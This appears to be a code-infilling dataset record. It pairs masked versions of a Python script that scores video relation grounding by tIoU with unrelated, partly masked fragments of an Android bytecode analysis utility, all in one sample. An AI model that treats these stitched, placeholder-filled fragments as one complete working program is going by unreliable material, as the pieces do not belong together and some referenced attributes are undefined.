    main()
|
flexible
|
{
"blob_id": "f26e6164fc4c07fd3339171e316b3a1f7a4be669",
"index": 2447,
"step-1": "<mask token>\n\n\ndef eval_ground_scores(gt_relations, pred_relations, tiou_threshold):\n \"\"\"\n\n :param gt_relations:\n :param pred_relations:\n :param tiou_threshold:\n :return:\n \"\"\"\n relation_num = len(gt_relations)\n predict, predict_sub, predict_obj = 0, 0, 0\n for relation, pred_trajs in pred_relations.items():\n pred_sub = pred_trajs['sub']\n pred_obj = pred_trajs['obj']\n flag, flag_s, flag_o = False, False, False\n gt_trajs = gt_relations[relation]\n for gt_traj in gt_trajs:\n gt_sub = gt_traj['sub']\n gt_obj = gt_traj['obj']\n s_tiou = tiou(pred_sub, gt_sub)\n o_tiou = tiou(pred_obj, gt_obj)\n r_iou = min(s_tiou, o_tiou)\n if r_iou >= tiou_threshold:\n flag = True\n if s_tiou >= tiou_threshold:\n flag_s = True\n if o_tiou >= tiou_threshold:\n flag_o = True\n if flag:\n predict += 1\n if flag_s:\n predict_sub += 1\n if flag_o:\n predict_obj += 1\n predict = predict / relation_num\n predict_sub = predict_sub / relation_num\n predict_obj = predict_obj / relation_num\n return predict, predict_sub, predict_obj, relation_num\n\n\ndef evaluate(groundtruth, prediction, tiou_threshold=0.5):\n \"\"\" evaluate visual relation detection and visual \n relation tagging.\n \"\"\"\n video_num = len(groundtruth)\n print('Computing grounding accuracy over {} videos...'.format(video_num))\n acc, acc_sub, acc_obj = 0.0, 0.0, 0.0\n gt_rnum = 0\n for qid, relation_gt in groundtruth.items():\n if qid not in prediction:\n continue\n relation_pred = prediction[qid]\n if len(relation_pred) == 0:\n continue\n video_acc, video_acc_sub, video_acc_obj, relation_num = (\n eval_ground_scores(relation_gt, relation_pred, tiou_threshold))\n acc += video_acc\n acc_sub += video_acc_sub\n acc_obj += video_acc_obj\n gt_rnum += relation_num\n acc /= video_num\n acc_sub /= video_num\n acc_obj /= video_num\n print('Acc_S\\t Acc_O\\t Acc_R')\n print('{:.2f}\\t {:.2f}\\t {:.2f}'.format(acc_sub * 100, acc_obj * 100, \n acc * 100))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef eval_ground_scores(gt_relations, pred_relations, tiou_threshold):\n \"\"\"\n\n :param gt_relations:\n :param pred_relations:\n :param tiou_threshold:\n :return:\n \"\"\"\n relation_num = len(gt_relations)\n predict, predict_sub, predict_obj = 0, 0, 0\n for relation, pred_trajs in pred_relations.items():\n pred_sub = pred_trajs['sub']\n pred_obj = pred_trajs['obj']\n flag, flag_s, flag_o = False, False, False\n gt_trajs = gt_relations[relation]\n for gt_traj in gt_trajs:\n gt_sub = gt_traj['sub']\n gt_obj = gt_traj['obj']\n s_tiou = tiou(pred_sub, gt_sub)\n o_tiou = tiou(pred_obj, gt_obj)\n r_iou = min(s_tiou, o_tiou)\n if r_iou >= tiou_threshold:\n flag = True\n if s_tiou >= tiou_threshold:\n flag_s = True\n if o_tiou >= tiou_threshold:\n flag_o = True\n if flag:\n predict += 1\n if flag_s:\n predict_sub += 1\n if flag_o:\n predict_obj += 1\n predict = predict / relation_num\n predict_sub = predict_sub / relation_num\n predict_obj = predict_obj / relation_num\n return predict, predict_sub, predict_obj, relation_num\n\n\ndef evaluate(groundtruth, prediction, tiou_threshold=0.5):\n \"\"\" evaluate visual relation detection and visual \n relation tagging.\n \"\"\"\n video_num = len(groundtruth)\n print('Computing grounding accuracy over {} videos...'.format(video_num))\n acc, acc_sub, acc_obj = 0.0, 0.0, 0.0\n gt_rnum = 0\n for qid, relation_gt in groundtruth.items():\n if qid not in prediction:\n continue\n relation_pred = prediction[qid]\n if len(relation_pred) == 0:\n continue\n video_acc, video_acc_sub, video_acc_obj, relation_num = (\n eval_ground_scores(relation_gt, relation_pred, tiou_threshold))\n acc += video_acc\n acc_sub += video_acc_sub\n acc_obj += video_acc_obj\n gt_rnum += relation_num\n acc /= video_num\n acc_sub /= video_num\n acc_obj /= video_num\n print('Acc_S\\t Acc_O\\t Acc_R')\n print('{:.2f}\\t {:.2f}\\t {:.2f}'.format(acc_sub * 100, acc_obj * 100, \n acc * 100))\n\n\ndef main():\n groundtruth_dir = 
'dataset/vidvrd/'\n gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')\n result_dir = 'results/'\n res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')\n if not osp.exists(res_file):\n print('Generating ...')\n generate_track_link.main(res_file)\n grountruth = load_file(gt_file)\n prediction = load_file(res_file)\n evaluate(grountruth, prediction)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef eval_ground_scores(gt_relations, pred_relations, tiou_threshold):\n \"\"\"\n\n :param gt_relations:\n :param pred_relations:\n :param tiou_threshold:\n :return:\n \"\"\"\n relation_num = len(gt_relations)\n predict, predict_sub, predict_obj = 0, 0, 0\n for relation, pred_trajs in pred_relations.items():\n pred_sub = pred_trajs['sub']\n pred_obj = pred_trajs['obj']\n flag, flag_s, flag_o = False, False, False\n gt_trajs = gt_relations[relation]\n for gt_traj in gt_trajs:\n gt_sub = gt_traj['sub']\n gt_obj = gt_traj['obj']\n s_tiou = tiou(pred_sub, gt_sub)\n o_tiou = tiou(pred_obj, gt_obj)\n r_iou = min(s_tiou, o_tiou)\n if r_iou >= tiou_threshold:\n flag = True\n if s_tiou >= tiou_threshold:\n flag_s = True\n if o_tiou >= tiou_threshold:\n flag_o = True\n if flag:\n predict += 1\n if flag_s:\n predict_sub += 1\n if flag_o:\n predict_obj += 1\n predict = predict / relation_num\n predict_sub = predict_sub / relation_num\n predict_obj = predict_obj / relation_num\n return predict, predict_sub, predict_obj, relation_num\n\n\ndef evaluate(groundtruth, prediction, tiou_threshold=0.5):\n \"\"\" evaluate visual relation detection and visual \n relation tagging.\n \"\"\"\n video_num = len(groundtruth)\n print('Computing grounding accuracy over {} videos...'.format(video_num))\n acc, acc_sub, acc_obj = 0.0, 0.0, 0.0\n gt_rnum = 0\n for qid, relation_gt in groundtruth.items():\n if qid not in prediction:\n continue\n relation_pred = prediction[qid]\n if len(relation_pred) == 0:\n continue\n video_acc, video_acc_sub, video_acc_obj, relation_num = (\n eval_ground_scores(relation_gt, relation_pred, tiou_threshold))\n acc += video_acc\n acc_sub += video_acc_sub\n acc_obj += video_acc_obj\n gt_rnum += relation_num\n acc /= video_num\n acc_sub /= video_num\n acc_obj /= video_num\n print('Acc_S\\t Acc_O\\t Acc_R')\n print('{:.2f}\\t {:.2f}\\t {:.2f}'.format(acc_sub * 100, acc_obj * 100, \n acc * 100))\n\n\ndef main():\n groundtruth_dir = 
'dataset/vidvrd/'\n gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')\n result_dir = 'results/'\n res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')\n if not osp.exists(res_file):\n print('Generating ...')\n generate_track_link.main(res_file)\n grountruth = load_file(gt_file)\n prediction = load_file(res_file)\n evaluate(grountruth, prediction)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import os.path as osp\nfrom evaluations.common import tiou\nfrom evaluations.util import load_file\nimport generate_track_link\n\n\ndef eval_ground_scores(gt_relations, pred_relations, tiou_threshold):\n \"\"\"\n\n :param gt_relations:\n :param pred_relations:\n :param tiou_threshold:\n :return:\n \"\"\"\n relation_num = len(gt_relations)\n predict, predict_sub, predict_obj = 0, 0, 0\n for relation, pred_trajs in pred_relations.items():\n pred_sub = pred_trajs['sub']\n pred_obj = pred_trajs['obj']\n flag, flag_s, flag_o = False, False, False\n gt_trajs = gt_relations[relation]\n for gt_traj in gt_trajs:\n gt_sub = gt_traj['sub']\n gt_obj = gt_traj['obj']\n s_tiou = tiou(pred_sub, gt_sub)\n o_tiou = tiou(pred_obj, gt_obj)\n r_iou = min(s_tiou, o_tiou)\n if r_iou >= tiou_threshold:\n flag = True\n if s_tiou >= tiou_threshold:\n flag_s = True\n if o_tiou >= tiou_threshold:\n flag_o = True\n if flag:\n predict += 1\n if flag_s:\n predict_sub += 1\n if flag_o:\n predict_obj += 1\n predict = predict / relation_num\n predict_sub = predict_sub / relation_num\n predict_obj = predict_obj / relation_num\n return predict, predict_sub, predict_obj, relation_num\n\n\ndef evaluate(groundtruth, prediction, tiou_threshold=0.5):\n \"\"\" evaluate visual relation detection and visual \n relation tagging.\n \"\"\"\n video_num = len(groundtruth)\n print('Computing grounding accuracy over {} videos...'.format(video_num))\n acc, acc_sub, acc_obj = 0.0, 0.0, 0.0\n gt_rnum = 0\n for qid, relation_gt in groundtruth.items():\n if qid not in prediction:\n continue\n relation_pred = prediction[qid]\n if len(relation_pred) == 0:\n continue\n video_acc, video_acc_sub, video_acc_obj, relation_num = (\n eval_ground_scores(relation_gt, relation_pred, tiou_threshold))\n acc += video_acc\n acc_sub += video_acc_sub\n acc_obj += video_acc_obj\n gt_rnum += relation_num\n acc /= video_num\n acc_sub /= video_num\n acc_obj /= video_num\n print('Acc_S\\t Acc_O\\t Acc_R')\n print('{:.2f}\\t 
{:.2f}\\t {:.2f}'.format(acc_sub * 100, acc_obj * 100, \n acc * 100))\n\n\ndef main():\n groundtruth_dir = 'dataset/vidvrd/'\n gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')\n result_dir = 'results/'\n res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')\n if not osp.exists(res_file):\n print('Generating ...')\n generate_track_link.main(res_file)\n grountruth = load_file(gt_file)\n prediction = load_file(res_file)\n evaluate(grountruth, prediction)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import os.path as osp\nfrom evaluations.common import tiou\nfrom evaluations.util import load_file\nimport generate_track_link\n\ndef eval_ground_scores(gt_relations, pred_relations, tiou_threshold):\n \"\"\"\n\n :param gt_relations:\n :param pred_relations:\n :param tiou_threshold:\n :return:\n \"\"\"\n # pred_relations = sorted(pred_relations, key=lambda x: x['score'], reverse=True)\n\n relation_num = len(gt_relations)\n predict, predict_sub, predict_obj = 0, 0, 0\n\n for relation, pred_trajs in pred_relations.items():\n pred_sub = pred_trajs['sub']\n pred_obj = pred_trajs['obj']\n flag, flag_s, flag_o = False, False, False\n\n gt_trajs = gt_relations[relation]\n\n # print(relation)\n\n for gt_traj in gt_trajs:\n gt_sub = gt_traj['sub']\n gt_obj = gt_traj['obj']\n s_tiou = tiou(pred_sub, gt_sub)\n o_tiou = tiou(pred_obj, gt_obj)\n r_iou = min(s_tiou, o_tiou)\n\n if r_iou >= tiou_threshold:\n flag = True\n if s_tiou >= tiou_threshold:\n flag_s = True\n if o_tiou >= tiou_threshold:\n flag_o = True\n if flag:\n predict += 1\n if flag_s:\n predict_sub += 1\n if flag_o:\n predict_obj += 1\n\n predict = predict / relation_num\n predict_sub = predict_sub /relation_num\n predict_obj = predict_obj /relation_num\n\n return predict, predict_sub, predict_obj, relation_num\n\n\ndef evaluate(groundtruth, prediction, tiou_threshold=0.5):\n \"\"\" evaluate visual relation detection and visual \n relation tagging.\n \"\"\"\n\n video_num = len(groundtruth)\n print('Computing grounding accuracy over {} videos...'.format(video_num))\n acc, acc_sub, acc_obj = 0.0, 0.0, 0.0\n\n gt_rnum = 0\n for qid, relation_gt in groundtruth.items():\n\n if qid not in prediction:\n continue\n relation_pred = prediction[qid]\n if len(relation_pred) == 0:\n continue\n\n video_acc, video_acc_sub, video_acc_obj, relation_num = eval_ground_scores(relation_gt, relation_pred, tiou_threshold)\n\n acc += video_acc\n acc_sub += video_acc_sub\n acc_obj += video_acc_obj\n gt_rnum += 
relation_num\n\n\n acc /= video_num\n acc_sub /= video_num\n acc_obj /= video_num\n\n print(\"Acc_S\\t Acc_O\\t Acc_R\")\n\n print('{:.2f}\\t {:.2f}\\t {:.2f}'.format(acc_sub*100, acc_obj*100, acc*100))\n\n\ndef main():\n\n groundtruth_dir = 'dataset/vidvrd/'\n gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')\n\n result_dir = 'results/'\n res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')\n if not osp.exists(res_file):\n print('Generating ...')\n generate_track_link.main(res_file)\n\n grountruth = load_file(gt_file)\n prediction = load_file(res_file)\n\n evaluate(grountruth, prediction)\n\n\nif __name__ == \"__main__\":\n main()\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class SVs(object):
def __init__(self, size, ntuple, buff):
self.__size = size
self.__value = ntuple._make(unpack(self.__size, buff))
def _get(self):
l = []
for i in self.__value._fields:
l.append(getattr(self.__value, i))
return pack(self.__size, *l)
<|reserved_special_token_0|>
def get_value_buff(self):
return self._get()
def get_value(self):
return self.__value
def set_value(self, attr):
self.__value = self.__value._replace(**attr)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class MethodBC(object):
def show(self, value):
getattr(self, 'show_' + value)()
class BuffHandle(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def size(self):
return len(self.__buff)
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def readNullString(self, size):
data = self.read(size)
return data
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def read_at(self, offset, size):
return self.__buff[offset:offset + size]
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def end(self):
return self.__idx == len(self.__buff)
class Buff(object):
def __init__(self, offset, buff):
self.offset = offset
self.buff = buff
self.size = len(buff)
class _Bytecode(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def readat(self, off):
if isinstance(off, SV):
off = off.value
return self.__buff[off:]
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def add_idx(self, idx):
self.__idx += idx
def register(self, type_register, fct):
self.__registers[type_register].append(fct)
def get_buff(self):
return self.__buff
def length_buff(self):
return len(self.__buff)
def set_buff(self, buff):
self.__buff = buff
def save(self, filename):
buff = self._save()
with open(filename, 'wb') as fd:
fd.write(buff)
<|reserved_special_token_0|>
class Node(object):
def __init__(self, n, s):
self.id = n
self.title = s
self.children = []
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def disable_print_colors():
colors = save_colors()
remove_colors()
return colors
<|reserved_special_token_0|>
def Warning(msg):
warning(msg)
def _PrintBanner():
print_fct = CONF['PRINT_FCT']
print_fct('*' * 75 + '\n')
<|reserved_special_token_0|>
def _PrintNote(note, tab=0):
print_fct = CONF['PRINT_FCT']
note_color = CONF['COLORS']['NOTE']
normal_color = CONF['COLORS']['NORMAL']
print_fct('\t' * tab + '%s# %s%s' % (note_color, note, normal_color) + '\n'
)
<|reserved_special_token_0|>
def _PrintXRef(tag, items):
print_fct = CONF['PRINT_FCT']
for i in items:
print_fct('%s: %s %s %s %s\n' % (tag, i[0].get_class_name(), i[0].
get_name(), i[0].get_descriptor(), ' '.join('%x' % j.get_idx() for
j in i[1])))
<|reserved_special_token_0|>
def _PrintDefault(msg):
print_fct = CONF['PRINT_FCT']
print_fct(msg)
def PrettyShow(m_a, basic_blocks, notes={}):
idx = 0
nb = 0
offset_color = CONF['COLORS']['OFFSET']
offset_addr_color = CONF['COLORS']['OFFSET_ADDR']
instruction_name_color = CONF['COLORS']['INSTRUCTION_NAME']
branch_false_color = CONF['COLORS']['BRANCH_FALSE']
branch_true_color = CONF['COLORS']['BRANCH_TRUE']
branch_color = CONF['COLORS']['BRANCH']
exception_color = CONF['COLORS']['EXCEPTION']
bb_color = CONF['COLORS']['BB']
normal_color = CONF['COLORS']['NORMAL']
print_fct = CONF['PRINT_FCT']
colors = CONF['COLORS']['OUTPUT']
for i in basic_blocks:
print_fct('%s%s%s : \n' % (bb_color, i.get_name(), normal_color))
instructions = i.get_instructions()
for ins in instructions:
if nb in notes:
for note in notes[nb]:
_PrintNote(note, 1)
print_fct('\t%s%-3d%s(%s%08x%s) ' % (offset_color, nb,
normal_color, offset_addr_color, idx, normal_color))
print_fct('%s%-20s%s' % (instruction_name_color, ins.get_name(),
normal_color))
operands = ins.get_operands()
print_fct('%s' % ', '.join(m_a.get_vm().colorize_operands(
operands, colors)))
op_value = ins.get_op_value()
if ins == instructions[-1] and i.childs:
print_fct(' ')
if (op_value == 43 or op_value == 44) and len(i.childs) > 1:
values = i.get_special_ins(idx).get_values()
print_fct('%s[ D:%s%s ' % (branch_false_color, i.childs
[0][2].get_name(), branch_color))
print_fct(' '.join('%d:%s' % (values[j], i.childs[j + 1
][2].get_name()) for j in range(0, len(i.childs) -
1)) + ' ]%s' % normal_color)
elif len(i.childs) == 2:
print_fct('%s[ %s%s ' % (branch_false_color, i.childs[0
][2].get_name(), branch_true_color))
print_fct(' '.join('%s' % c[2].get_name() for c in i.
childs[1:]) + ' ]%s' % normal_color)
else:
print_fct('%s[ ' % branch_color + ' '.join('%s' % c[2].
get_name() for c in i.childs) + ' ]%s' % normal_color)
idx += ins.get_length()
nb += 1
print_fct('\n')
if i.get_exception_analysis():
print_fct('\t%s%s%s\n' % (exception_color, i.exception_analysis
.show_buff(), normal_color))
print_fct('\n')
class TmpBlock(object):
def __init__(self, name):
self.name = name
def get_name(self):
return self.name
def method2json(mx, directed_graph=False):
if directed_graph:
return method2json_direct(mx)
return method2json_undirect(mx)
def method2json_undirect(mx):
d = {}
reports = []
d['reports'] = reports
for DVMBasicMethodBlock in mx.basic_blocks.gets():
cblock = {}
cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()
cblock['registers'] = mx.get_method().get_code().get_registers_size()
cblock['instructions'] = []
ins_idx = DVMBasicMethodBlock.start
for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(
):
c_ins = {}
c_ins['idx'] = ins_idx
c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()
c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(
ins_idx)
cblock['instructions'].append(c_ins)
ins_idx += DVMBasicMethodBlockInstruction.get_length()
cblock['Edge'] = []
for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:
cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())
reports.append(cblock)
return json.dumps(d)
def method2json_direct(mx):
d = {}
reports = []
d['reports'] = reports
hooks = {}
l = []
for DVMBasicMethodBlock in mx.basic_blocks.gets():
for index, DVMBasicMethodBlockChild in enumerate(DVMBasicMethodBlock
.childs):
if DVMBasicMethodBlock.get_name() == DVMBasicMethodBlockChild[-1
].get_name():
preblock = TmpBlock(DVMBasicMethodBlock.get_name() + '-pre')
cnblock = {}
cnblock['BasicBlockId'] = DVMBasicMethodBlock.get_name(
) + '-pre'
cnblock['start'] = DVMBasicMethodBlock.start
cnblock['notes'] = []
cnblock['Edge'] = [DVMBasicMethodBlock.get_name()]
cnblock['registers'] = 0
cnblock['instructions'] = []
cnblock['info_bb'] = 0
l.append(cnblock)
for parent in DVMBasicMethodBlock.fathers:
hooks[parent[-1].get_name()] = []
hooks[parent[-1].get_name()].append(preblock)
for idx, child in enumerate(parent[-1].childs):
if child[-1].get_name(
) == DVMBasicMethodBlock.get_name():
hooks[parent[-1].get_name()].append(child[-1])
for DVMBasicMethodBlock in mx.basic_blocks.gets():
cblock = {}
cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()
cblock['start'] = DVMBasicMethodBlock.start
cblock['notes'] = DVMBasicMethodBlock.get_notes()
cblock['registers'] = mx.get_method().get_code().get_registers_size()
cblock['instructions'] = []
ins_idx = DVMBasicMethodBlock.start
last_instru = None
for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(
):
c_ins = {}
c_ins['idx'] = ins_idx
c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()
c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(
ins_idx)
c_ins['formatted_operands'
] = DVMBasicMethodBlockInstruction.get_formatted_operands()
cblock['instructions'].append(c_ins)
if DVMBasicMethodBlockInstruction.get_op_value(
) == 43 or DVMBasicMethodBlockInstruction.get_op_value() == 44:
values = DVMBasicMethodBlock.get_special_ins(ins_idx)
cblock['info_next'] = values.get_values()
ins_idx += DVMBasicMethodBlockInstruction.get_length()
last_instru = DVMBasicMethodBlockInstruction
cblock['info_bb'] = 0
if DVMBasicMethodBlock.childs:
if len(DVMBasicMethodBlock.childs) > 1:
cblock['info_bb'] = 1
if last_instru.get_op_value() == 43 or last_instru.get_op_value(
) == 44:
cblock['info_bb'] = 2
cblock['Edge'] = []
for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:
ok = False
if DVMBasicMethodBlock.get_name() in hooks:
if DVMBasicMethodBlockChild[-1] in hooks[DVMBasicMethodBlock
.get_name()]:
ok = True
cblock['Edge'].append(hooks[DVMBasicMethodBlock.
get_name()][0].get_name())
if not ok:
cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())
exception_analysis = DVMBasicMethodBlock.get_exception_analysis()
if exception_analysis:
cblock['Exceptions'] = exception_analysis.get()
reports.append(cblock)
reports.extend(l)
return json.dumps(d)
class SV(object):
def __init__(self, size, buff):
self.__size = size
self.__value = unpack(self.__size, buff)[0]
def _get(self):
return pack(self.__size, self.__value)
def __str__(self):
return '0x%x' % self.__value
def __int__(self):
return self.__value
def get_value_buff(self):
return self._get()
def get_value(self):
return self.__value
def set_value(self, attr):
self.__value = attr
class SVs(object):
def __init__(self, size, ntuple, buff):
self.__size = size
self.__value = ntuple._make(unpack(self.__size, buff))
def _get(self):
l = []
for i in self.__value._fields:
l.append(getattr(self.__value, i))
return pack(self.__size, *l)
def _export(self):
return [x for x in self.__value._fields]
def get_value_buff(self):
return self._get()
def get_value(self):
return self.__value
def set_value(self, attr):
self.__value = self.__value._replace(**attr)
def __str__(self):
return self.__value.__str__()
<|reserved_special_token_0|>
class MethodBC(object):
def show(self, value):
getattr(self, 'show_' + value)()
class BuffHandle(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def size(self):
return len(self.__buff)
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def readNullString(self, size):
data = self.read(size)
return data
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def read_at(self, offset, size):
return self.__buff[offset:offset + size]
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def end(self):
return self.__idx == len(self.__buff)
class Buff(object):
def __init__(self, offset, buff):
self.offset = offset
self.buff = buff
self.size = len(buff)
class _Bytecode(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def readat(self, off):
if isinstance(off, SV):
off = off.value
return self.__buff[off:]
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def add_idx(self, idx):
self.__idx += idx
def register(self, type_register, fct):
self.__registers[type_register].append(fct)
def get_buff(self):
return self.__buff
def length_buff(self):
return len(self.__buff)
def set_buff(self, buff):
self.__buff = buff
def save(self, filename):
buff = self._save()
with open(filename, 'wb') as fd:
fd.write(buff)
def FormatClassToJava(input):
"""
Transoform a typical xml format class into java format
:param input: the input class name
:rtype: string
"""
return 'L' + input.replace('.', '/') + ';'
def FormatClassToPython(input):
i = input[:-1]
i = i.replace('/', '_')
i = i.replace('$', '_')
return i
def FormatNameToPython(input):
i = input.replace('<', '')
i = i.replace('>', '')
i = i.replace('$', '_')
return i
def FormatDescriptorToPython(input):
i = input.replace('/', '_')
i = i.replace(';', '')
i = i.replace('[', '')
i = i.replace('(', '')
i = i.replace(')', '')
i = i.replace(' ', '')
i = i.replace('$', '')
return i
class Node(object):
def __init__(self, n, s):
self.id = n
self.title = s
self.children = []
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def disable_print_colors():
colors = save_colors()
remove_colors()
return colors
def enable_print_colors(colors):
enable_colors(colors)
<|reserved_special_token_0|>
def Warning(msg):
warning(msg)
def _PrintBanner():
print_fct = CONF['PRINT_FCT']
print_fct('*' * 75 + '\n')
<|reserved_special_token_0|>
def _PrintNote(note, tab=0):
print_fct = CONF['PRINT_FCT']
note_color = CONF['COLORS']['NOTE']
normal_color = CONF['COLORS']['NORMAL']
print_fct('\t' * tab + '%s# %s%s' % (note_color, note, normal_color) + '\n'
)
<|reserved_special_token_0|>
def _PrintXRef(tag, items):
print_fct = CONF['PRINT_FCT']
for i in items:
print_fct('%s: %s %s %s %s\n' % (tag, i[0].get_class_name(), i[0].
get_name(), i[0].get_descriptor(), ' '.join('%x' % j.get_idx() for
j in i[1])))
<|reserved_special_token_0|>
def _PrintDefault(msg):
print_fct = CONF['PRINT_FCT']
print_fct(msg)
def PrettyShow(m_a, basic_blocks, notes={}):
idx = 0
nb = 0
offset_color = CONF['COLORS']['OFFSET']
offset_addr_color = CONF['COLORS']['OFFSET_ADDR']
instruction_name_color = CONF['COLORS']['INSTRUCTION_NAME']
branch_false_color = CONF['COLORS']['BRANCH_FALSE']
branch_true_color = CONF['COLORS']['BRANCH_TRUE']
branch_color = CONF['COLORS']['BRANCH']
exception_color = CONF['COLORS']['EXCEPTION']
bb_color = CONF['COLORS']['BB']
normal_color = CONF['COLORS']['NORMAL']
print_fct = CONF['PRINT_FCT']
colors = CONF['COLORS']['OUTPUT']
for i in basic_blocks:
print_fct('%s%s%s : \n' % (bb_color, i.get_name(), normal_color))
instructions = i.get_instructions()
for ins in instructions:
if nb in notes:
for note in notes[nb]:
_PrintNote(note, 1)
print_fct('\t%s%-3d%s(%s%08x%s) ' % (offset_color, nb,
normal_color, offset_addr_color, idx, normal_color))
print_fct('%s%-20s%s' % (instruction_name_color, ins.get_name(),
normal_color))
operands = ins.get_operands()
print_fct('%s' % ', '.join(m_a.get_vm().colorize_operands(
operands, colors)))
op_value = ins.get_op_value()
if ins == instructions[-1] and i.childs:
print_fct(' ')
if (op_value == 43 or op_value == 44) and len(i.childs) > 1:
values = i.get_special_ins(idx).get_values()
print_fct('%s[ D:%s%s ' % (branch_false_color, i.childs
[0][2].get_name(), branch_color))
print_fct(' '.join('%d:%s' % (values[j], i.childs[j + 1
][2].get_name()) for j in range(0, len(i.childs) -
1)) + ' ]%s' % normal_color)
elif len(i.childs) == 2:
print_fct('%s[ %s%s ' % (branch_false_color, i.childs[0
][2].get_name(), branch_true_color))
print_fct(' '.join('%s' % c[2].get_name() for c in i.
childs[1:]) + ' ]%s' % normal_color)
else:
print_fct('%s[ ' % branch_color + ' '.join('%s' % c[2].
get_name() for c in i.childs) + ' ]%s' % normal_color)
idx += ins.get_length()
nb += 1
print_fct('\n')
if i.get_exception_analysis():
print_fct('\t%s%s%s\n' % (exception_color, i.exception_analysis
.show_buff(), normal_color))
print_fct('\n')
class TmpBlock(object):
def __init__(self, name):
self.name = name
def get_name(self):
return self.name
def method2json(mx, directed_graph=False):
if directed_graph:
return method2json_direct(mx)
return method2json_undirect(mx)
def method2json_undirect(mx):
d = {}
reports = []
d['reports'] = reports
for DVMBasicMethodBlock in mx.basic_blocks.gets():
cblock = {}
cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()
cblock['registers'] = mx.get_method().get_code().get_registers_size()
cblock['instructions'] = []
ins_idx = DVMBasicMethodBlock.start
for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(
):
c_ins = {}
c_ins['idx'] = ins_idx
c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()
c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(
ins_idx)
cblock['instructions'].append(c_ins)
ins_idx += DVMBasicMethodBlockInstruction.get_length()
cblock['Edge'] = []
for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:
cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())
reports.append(cblock)
return json.dumps(d)
def method2json_direct(mx):
d = {}
reports = []
d['reports'] = reports
hooks = {}
l = []
for DVMBasicMethodBlock in mx.basic_blocks.gets():
for index, DVMBasicMethodBlockChild in enumerate(DVMBasicMethodBlock
.childs):
if DVMBasicMethodBlock.get_name() == DVMBasicMethodBlockChild[-1
].get_name():
preblock = TmpBlock(DVMBasicMethodBlock.get_name() + '-pre')
cnblock = {}
cnblock['BasicBlockId'] = DVMBasicMethodBlock.get_name(
) + '-pre'
cnblock['start'] = DVMBasicMethodBlock.start
cnblock['notes'] = []
cnblock['Edge'] = [DVMBasicMethodBlock.get_name()]
cnblock['registers'] = 0
cnblock['instructions'] = []
cnblock['info_bb'] = 0
l.append(cnblock)
for parent in DVMBasicMethodBlock.fathers:
hooks[parent[-1].get_name()] = []
hooks[parent[-1].get_name()].append(preblock)
for idx, child in enumerate(parent[-1].childs):
if child[-1].get_name(
) == DVMBasicMethodBlock.get_name():
hooks[parent[-1].get_name()].append(child[-1])
for DVMBasicMethodBlock in mx.basic_blocks.gets():
cblock = {}
cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()
cblock['start'] = DVMBasicMethodBlock.start
cblock['notes'] = DVMBasicMethodBlock.get_notes()
cblock['registers'] = mx.get_method().get_code().get_registers_size()
cblock['instructions'] = []
ins_idx = DVMBasicMethodBlock.start
last_instru = None
for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(
):
c_ins = {}
c_ins['idx'] = ins_idx
c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()
c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(
ins_idx)
c_ins['formatted_operands'
] = DVMBasicMethodBlockInstruction.get_formatted_operands()
cblock['instructions'].append(c_ins)
